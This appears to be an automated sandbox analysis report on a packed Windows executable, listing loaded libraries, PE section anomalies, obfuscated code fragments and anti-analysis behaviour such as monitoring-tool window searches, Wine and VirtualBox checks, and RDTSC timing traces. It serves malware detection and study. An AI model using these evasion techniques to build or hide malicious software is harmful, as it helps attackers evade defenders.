Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1801728 > 1048576
Source: file.exe | Static PE information: Raw size of jerbjqqv is bigger than: 0x100000 < 0x19e000

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jerbjqqv:EW;nuqdewfy:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00326390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c2726 should be: 0x1c5cce
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: jerbjqqv
Source: file.exe | Static PE information: section name: nuqdewfy
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A0069 push esi; mov dword ptr [esp], ecx (0_2_0079FFFF)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006EF077 push 11A124A4h; mov dword ptr [esp], edx (0_2_006EF09F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076D057 push 18E78272h; mov dword ptr [esp], ebp (0_2_0076D07B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076D057 push eax; mov dword ptr [esp], edx (0_2_0076D084)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006CC05B push ebp; mov dword ptr [esp], 66F5E965h (0_2_006CC083)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006CC05B push esi; mov dword ptr [esp], ecx (0_2_006CC08C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F6823 push ecx; mov dword ptr [esp], ebp (0_2_006F6828)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F6823 push 0A201E51h; mov dword ptr [esp], esi (0_2_006F6832)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00654835 push 083E30B3h; mov dword ptr [esp], ecx (0_2_006548CE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0077702E push 197425E1h; mov dword ptr [esp], ecx (0_2_00777050)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E3007 push 654CE016h; mov dword ptr [esp], eax (0_2_006E302A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072F019 push edi; mov dword ptr [esp], 7D5E4891h (0_2_0072F04E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0072F019 push eax; mov dword ptr [esp], edx (0_2_0072F07F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D0800 push ebp; mov dword ptr [esp], ebx (0_2_006D0888)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00992000 push edi; mov dword ptr [esp], 3A491801h (0_2_0099201A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00992000 push edi; mov dword ptr [esp], ebx (0_2_00992028)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00992000 push ecx; mov dword ptr [esp], edi (0_2_00992109)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00992000 push eax; mov dword ptr [esp], 6B3F5BB1h (0_2_00992137)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push ebp; mov dword ptr [esp], esi (0_2_006B196A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push 4E910A0Dh; mov dword ptr [esp], esi (0_2_006B19F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push 2963E3E6h; mov dword ptr [esp], ebx (0_2_006B1A03)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push ecx; mov dword ptr [esp], 7AEE06C2h (0_2_006B1AC2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push ecx; mov dword ptr [esp], 18C6C348h (0_2_006B1B17)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push 13211ECCh; mov dword ptr [esp], eax (0_2_006B1B84)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push edx; mov dword ptr [esp], 7BFEC021h (0_2_006B1B89)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push 2AEB256Dh; mov dword ptr [esp], eax (0_2_006B1C1B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006B18C9 push 245D70B8h; mov dword ptr [esp], eax (0_2_006B1CDE)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 197A9013h; mov dword ptr [esp], eax0_2_006B1CF6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push 5D1E8AF1h; mov dword ptr [esp], edx0_2_006B1D74
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push ebp; mov dword ptr [esp], edx0_2_006B1DE4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C9 push edi; mov dword ptr [esp], edx0_2_006B1E57
              Source: file.exeStatic PE information: section name: jerbjqqv entropy: 7.954382672261457

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00326390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00326390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-26053
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54F959 second address: 54F95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C06E3 second address: 6C06FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE8904C1C3h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C06FE second address: 6C0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jnl 00007FCE88B69066h 0x0000000f jmp 00007FCE88B69074h 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 jmp 00007FCE88B6906Fh 0x0000001b pop ecx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C0733 second address: 6C0739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C0739 second address: 6C073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C073F second address: 6C0743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CB987 second address: 6CB98D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE3F9 second address: 54F959 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCE88C945DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 1E398C69h 0x00000011 and esi, dword ptr [ebp+122D36FAh] 0x00000017 push dword ptr [ebp+122D1345h] 0x0000001d call dword ptr [ebp+122D192Dh] 0x00000023 pushad 0x00000024 js 00007FCE88C945DCh 0x0000002a sub dword ptr [ebp+122D184Dh], ebx 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D19CBh], eax 0x00000037 popad 0x00000038 xor eax, eax 0x0000003a jbe 00007FCE88C945E5h 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 pushad 0x00000045 mov dword ptr [ebp+122D19CBh], edi 0x0000004b or ecx, dword ptr [ebp+122D35A6h] 0x00000051 popad 0x00000052 mov dword ptr [ebp+122D36B6h], eax 0x00000058 jmp 00007FCE88C945E1h 0x0000005d mov esi, 0000003Ch 0x00000062 jp 00007FCE88C945DCh 0x00000068 mov dword ptr [ebp+122D184Dh], edi 0x0000006e add esi, dword ptr [esp+24h] 0x00000072 jnp 00007FCE88C945E2h 0x00000078 jmp 00007FCE88C945DCh 0x0000007d lodsw 0x0000007f sub dword ptr [ebp+122D19CBh], esi 0x00000085 add eax, dword ptr [esp+24h] 0x00000089 sub dword ptr [ebp+122D196Eh], eax 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 stc 0x00000094 push eax 0x00000095 push edx 0x00000096 push eax 0x00000097 push edx 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE503 second address: 6CE509 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE5B5 second address: 6CE646 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, 711092C5h 0x00000010 mov dword ptr [ebp+122D1966h], edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1D01h], esi 0x0000001e push A4FB9B6Dh 0x00000023 jmp 00007FCE88C945E2h 0x00000028 add dword ptr [esp], 5B046513h 0x0000002f jne 00007FCE88C945DCh 0x00000035 push 00000003h 0x00000037 mov si, DBB1h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FCE88C945D8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 jmp 00007FCE88C945E0h 0x0000005c push 00000003h 0x0000005e mov edi, dword ptr [ebp+122D37EAh] 0x00000064 push 9DEB2935h 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE70D second address: 6CE757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 1E226FBAh 0x00000010 mov dword ptr [ebp+122D196Eh], edi 0x00000016 push 00000003h 0x00000018 xor dh, FFFFFFA5h 0x0000001b push 00000000h 0x0000001d mov cl, 80h 0x0000001f push 00000003h 0x00000021 mov dl, 83h 0x00000023 call 00007FCE8882CE19h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b jg 00007FCE8882CE16h 0x00000031 pop edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE757 second address: 6CE776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88C945E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE776 second address: 6CE77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE77B second address: 6CE785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCE88C945D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE785 second address: 6CE7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jne 00007FCE8882CE18h 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jp 00007FCE8882CE16h 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007FCE8882CE1Ah 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jbe 00007FCE8882CE1Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE7BF second address: 6CE7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE7C3 second address: 6CE813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edx, dword ptr [ebp+122D35C6h] 0x00000010 lea ebx, dword ptr [ebp+12452358h] 0x00000016 mov esi, dword ptr [ebp+122D3802h] 0x0000001c xchg eax, ebx 0x0000001d jp 00007FCE8882CE24h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007FCE8882CE1Bh 0x0000002c push edx 0x0000002d pop edx 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CE813 second address: 6CE818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EF127 second address: 6EF173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCE8882CE16h 0x0000000a popad 0x0000000b jmp 00007FCE8882CE26h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 jmp 00007FCE8882CE1Eh 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007FCE8882CE24h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ECF69 second address: 6ECF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ECF6F second address: 6ECF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE8882CE28h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED2CE second address: 6ED2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED2D2 second address: 6ED2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED2DA second address: 6ED30E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88C945E7h 0x00000007 jmp 00007FCE88C945E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED30E second address: 6ED312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED312 second address: 6ED31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED31E second address: 6ED34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FCE8882CE16h 0x0000000c popad 0x0000000d pushad 0x0000000e je 00007FCE8882CE16h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FCE8882CE20h 0x0000001d popad 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop edx 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED873 second address: 6ED8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88C945E5h 0x00000009 pop esi 0x0000000a jmp 00007FCE88C945DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCE88C945DDh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED8AC second address: 6ED8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED8B0 second address: 6ED8EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FCE88C945E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FCE88C945DCh 0x00000014 jnp 00007FCE88C945D6h 0x0000001a jmp 00007FCE88C945DFh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6ED8EB second address: 6ED8F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jno 00007FCE8882CE16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EDA7B second address: 6EDA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCE88C945DBh 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EE084 second address: 6EE098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE8882CE1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EE098 second address: 6EE09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EE34D second address: 6EE351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EE8FE second address: 6EE909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EED13 second address: 6EED1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6F2454 second address: 6F245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B1486 second address: 6B148B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA63C second address: 6FA643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA643 second address: 6FA649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FBF06 second address: 6FBF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FBF14 second address: 6FBF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FBFAB second address: 6FC026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FCE88C945E9h 0x0000000e mov eax, dword ptr [eax] 0x00000010 jng 00007FCE88C945F1h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FCE88C945E7h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007FCE88C945DDh 0x00000028 pop eax 0x00000029 call 00007FCE88C945DAh 0x0000002e mov si, 9B63h 0x00000032 pop esi 0x00000033 and edi, dword ptr [ebp+122D3746h] 0x00000039 push 92FB8150h 0x0000003e push eax 0x0000003f push edx 0x00000040 je 00007FCE88C945D8h 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FC511 second address: 6FC517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FC517 second address: 6FC51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FC7A5 second address: 6FC7AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FC7AB second address: 6FC7CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FCE88C945F0h 0x0000000f pushad 0x00000010 jmp 00007FCE88C945E2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FCFE0 second address: 6FCFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCE8882CE16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FD23E second address: 6FD242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FD242 second address: 6FD246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FE0B4 second address: 6FE0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FF280 second address: 6FF31A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FCE8882CE27h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f jmp 00007FCE8882CE25h 0x00000014 pop ecx 0x00000015 nop 0x00000016 mov esi, dword ptr [ebp+122D227Dh] 0x0000001c pushad 0x0000001d mov dx, di 0x00000020 popad 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FCE8882CE18h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d xor edi, dword ptr [ebp+122D377Ah] 0x00000043 add dword ptr [ebp+122D19DDh], edx 0x00000049 push 00000000h 0x0000004b jmp 00007FCE8882CE1Ch 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jp 00007FCE8882CE29h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FF31A second address: 6FF342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88C945E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCE88C945DFh 0x00000012 rdtsc
